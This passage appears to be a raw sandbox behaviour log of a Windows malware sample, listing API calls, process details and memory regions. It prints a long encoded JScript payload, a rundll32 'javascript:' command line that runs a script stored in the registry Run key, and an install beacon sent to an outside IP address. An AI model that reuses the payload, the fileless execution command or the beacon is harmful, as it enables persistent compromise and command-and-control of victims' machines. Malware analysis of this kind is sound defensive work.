RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef52 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0036.235] NtCreateKey (in: KeyHandle=0x18f02c, DesiredAccess=0xf013f, ObjectAttributes=0x18f048*(Length=0x18, RootDirectory=0x234, ObjectName="\x01", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x18f02c*=0x268) returned 0x0 [0036.235] RegFlushKey (hKey=0x234) returned 0x0 [0036.324] RegCloseKey (hKey=0x234) returned 0x0 [0036.324] GetModuleHandleA (lpModuleName="kernel32") returned 0x765b0000 [0036.324] GetProcAddress (hModule=0x765b0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x765dd650 [0036.324] Wow64DisableWow64FsRedirection (in: OldValue=0x18f02c | out: OldValue=0x18f02c*=0x0) returned 1 [0036.324] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\rundll32.exe", lpDst=0x18f248, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\rundll32.exe") returned 0x21 [0036.324] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\rundll32.exe", lpCommandLine="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f060*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f038 | out: lpCommandLine="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", lpProcessInformation=0x18f038*(hProcess=0x26c, hThread=0x234, dwProcessId=0xa3c, dwThreadId=0xa40)) returned 1 [0036.326] CloseHandle (hObject=0x234) returned 1 [0036.326] WaitForSingleObject (hHandle=0x26c, dwMilliseconds=0xffffffff) returned 0x0 [0047.728] GetExitCodeProcess (in: hProcess=0x26c, lpExitCode=0x409034 | out: lpExitCode=0x409034*=0x0) returned 1 [0047.728] OpenEventA (dwDesiredAccess=0x1, bInheritHandle=0, lpName="c43dc7584a0") returned 0x270 [0047.728] CloseHandle (hObject=0x270) returned 1 [0047.728] CloseHandle (hObject=0x26c) returned 1 [0047.728] Encoder:IUnknown:Release (This=0x74f640) returned 0x0 [0047.731] VirtualFree (lpAddress=0x3d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.731] _vsnprintf (in: string=0x18f9b8, count=0x104, format="install", ap=0x18fbd8 | out: string="install") returned 7 [0047.731] GetVersionExA (in: lpVersionInformation=0x18f6f8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f6f8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.731] _snprintf (in: _Dest=0x18fac0, _Count=0x103, _Format="%1d.%1d.%04d_%1d.%1d" | out: _Dest="6.1.7601_1.0") returned 12 [0047.732] GetModuleHandleA (lpModuleName="kernel32") returned 0x765b0000 [0047.732] GetProcAddress (hModule=0x765b0000, lpProcName="IsWow64Process") returned 0x765c195e [0047.732] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f790 | out: Wow64Process=0x18f790) returned 1 [0047.732] _snprintf (in: _Dest=0x18f8b0, _Count=0x103, _Format="type=%s&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s" | out: _Dest="type=install&version=1.0&aid=8&builddate=060414&id=c43dc7584a0&os=6.1.7601_1.0_64") returned 81 [0047.732] GetTickCount () returned 0x13cd0 [0047.732] RtlRandom (in: Seed=0x18f784 | out: Seed=0x18f784) returned 0x1b8b7c79 [0047.732] _alloca_probe () returned 0x401126 [0047.732] _vsnprintf (in: string=0x18b780, count=0x1000, format="http://%s/q", ap=0x18f798 | out: string="http://178.89.159.34/q") returned 22 [0047.732] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18b5f0 | out: lpWSAData=0x18b5f0) returned 0 [0047.732] InternetCrackUrlA (in: lpszUrl="http://178.89.159.34/q", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x18b5b4 | out: lpUrlComponents=0x18b5b4) returned 1 [0047.732] socket (af=2, type=1, protocol=6) returned 0x260 [0047.732] gethostbyname (name="178.89.159.34") returned 0x304898*(h_name="178.89.159.34", h_aliases=0x3048a8*=(), h_addrtype=2, h_length=4, h_addr_list=0x3048ac*=([0]="178.89.159.34")) [0047.735] connect (s=0x260, name=0x18b5a4*(sa_family=2, sin_port=0x50, sin_addr="178.89.159.34"), namelen=16) Thread: id = 2 os_tid = 0xa14 Thread: id = 18 os_tid = 0xa8c Thread: id = 19 os_tid = 0xa90 Process: id = "2" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x657ce000" os_pid = "0xa3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa00" cmd_line = "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010611" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 249 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 250 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 251 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 252 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 253 start_va = 0x77380000 end_va = 0x77528fff entry_point = 0x77380000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 254 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 255 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 256 start_va = 0x7fff4000 end_va = 0x7fff4fff entry_point = 0x0 region_type = private name = "private_0x000000007fff4000" filename = "" Region: id = 257 start_va = 0xff240000 end_va = 0xff24efff entry_point = 0xff240000 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe") Region: id = 258 start_va = 0x7feff6a0000 end_va = 0x7feff6a0fff entry_point = 0x7feff6a0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 259 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 260 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 261 start_va = 